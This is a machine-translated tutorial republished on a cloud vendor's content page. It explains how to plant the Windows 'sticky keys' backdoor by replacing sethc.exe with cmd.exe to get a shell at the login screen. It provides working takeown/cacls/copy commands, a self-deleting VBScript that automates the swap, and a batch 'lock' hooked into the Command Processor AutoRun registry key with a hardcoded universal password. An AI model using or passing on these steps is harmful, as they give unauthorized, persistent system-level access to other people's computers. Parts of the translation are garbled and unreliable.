The coolest Windows Backdoor Sethc.exe_ security tutorial ever seen in a perverted invasion

Source: Internet
Author: User
Tags goto
Back door principle:

Under Windows 2000/xp/vista, press the SHIFT key 5 times to open the glue, run the Sethc.exe, and open it in the login interface. This is reminiscent of Windows screensaver, after replacing the program with Cmd.exe, you can open the shell.

Xp:

Eject the installation source CD (or rename the installation directory on your hard disk)
CD%widnir%\system32\dllcache
ren sethc.exe *.ex~
CD%widnir%\system32
copy/y Cmd.exe Sethc.exe

Vista:

takeown/f C:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe/g Administrator:f
Then replace the file by the XP method

In the Login interface Press 5 This shift, come out cmd shell, and then ...

Backdoor Extensions:
Copy Code code as follows:

Dim obj, success
Set obj = CreateObject ("Wscript.Shell")
Success = Obj.run ("cmd/c takeown/f%systemroot%\system32\sethc.exe", 0, True)
Success = Obj.run ("cmd/c Echo y| cacls%systemroot%\system32\sethc.exe/g%username%:f ", 0, True)
Success = Obj.run ("cmd/c copy%systemroot%\system32\cmd.exe%systemroot%\system32\acmd.exe", 0, True)
Success = Obj.run ("cmd/c copy%systemroot%\system32\sethc.exe%systemroot%\system32\asethc.exe", 0, True)
Success = Obj.run ("cmd/c del%systemroot%\system32\sethc.exe", 0, True)
Success = Obj.run ("cmd/c ren%systemroot%\system32\acmd.exe sethc.exe", 0, True)


The second sentence is the most interesting. Auto answer .... I've had a similar problem before.
Update again. Add a self deletion, simplify the code ...
Copy Code code as follows:

On Error Resume Next
Dim obj, success
Set obj = CreateObject ("Wscript.Shell")
Success = Obj.run ("cmd/c takeown/f%systemroot%\system32\sethc.exe&echo y| cacls%systemroot%\system32\sethc.exe/g%username%:f©%systemroot%\system32\cmd.exe%SystemRoot%\system32\acmd.exe ©%systemroot%\system32\sethc.exe%systemroot%\system32\asethc.exe&del%systemroot%\system32\sethc.exe& ren%systemroot%\system32\acmd.exe sethc.exe ", 0, True)
CreateObject ("Scripting.FileSystemObject"). DeleteFile (WScript.ScriptName)

Rear door lock Extension:
Allyesno Note: CMD lock can be used for Cmdshell password verification
The following way to lock the door is to save the code as a Bdlock.bat
You can then modify the registry location to
Copy Code code as follows:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor]
"AutoRun" = "Bdlock.bat"

@Echo off
Title Door Login Verification
Color A
Cls
Set temprandom=%random%
echo Please enter a CAPTCHA:%temprandom%
set/p check=
If "%check%" = = "%temprandom%%temprandom%" goto Passcheck
If "%check%" = = "%temprandom%" (
REM Backdoor Server Authentication
REM If no backdoor authentication server please drop a line of code from REM annotation
If exist \192.168.8.8\backdoor$\pass goto Passcheck
)
echo Validation failed
Pause
Exit
:p Asscheck
Echo Validation Succeeded
If "%passcmdlock%" = = "http://blog.csdn.net/freexploit/" Goto endx
Set passcmdlock=http://blog.csdn.net/freexploit/
: Allyesno
Set Errorlevel=>nul
Echo Please enter a validation password?
Set Password=allyesno is a Pig>nul
set/p password=
REM Universal Password
If "%password%" = = "Allyesno is a sb" goto ENDX
If%time:~1,1%==0 Set timechange=a
If%time:~1,1%==1 Set timechange=b
If%time:~1,1%==2 Set Timechange=c
If%time:~1,1%==3 Set Timechange=d
If%time:~1,1%==4 Set timechange=e
If%time:~1,1%==5 Set timechange=f
If%time:~1,1%==6 Set timechange=g
If%time:~1,1%==7 Set timechange=h
If%time:~1,1%==8 Set timechange=i
If%time:~1,1%==9 Set Timechange=j
set/a sum=%time:~1,1%+%time:~1,1%
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$" >nul
If "%errorlevel%" = = "0" Cls&echo password correct &goto end
Echo please contact customer service for correct password! &goto Allyesno
: End
Set Password=>nul
Set Errorlevel=>nul
Echo

: EndX

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.